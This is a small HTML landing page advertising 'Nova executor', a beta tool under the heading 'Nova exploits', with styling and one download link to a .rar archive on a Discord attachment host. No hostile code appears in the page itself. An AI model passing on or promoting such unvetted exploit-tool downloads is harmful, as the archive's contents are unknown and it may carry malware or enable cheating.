<head>
    <style>
    .card {
    max-width: 380px;
    margin: auto;
    text-align: center;
    }
    #main {
    background-image: url("https://cdn.discordapp.com/attachments/1152706456668344451/1152709924414042132/standard_1.gif");
    background-repeat: no-repeat;
    background-size: cover;
    }
    .price {
    color: #f1294a;
    font-size: 18px;
    }
    .card button {
    padding: 10px;
    color: white;
    background-color: #f1294a;
    text-align: center;
    }
    </style>
    </head>
    <body id="main">
    <h2 style="text-align:center">Nova exploits</h2>
    <div class="card">
    <h1><b>Nova executor</b></h1>
    <h3 class="price">Beta release</h3>
    <h2>
    <ul>
    </ul>
    </h2>
    <a href="https://cdn.discordapp.com/attachments/1152341230244597861/1152706349671661698/Nova.rar" target="_blank">Download</a>
    </div>
    </body>
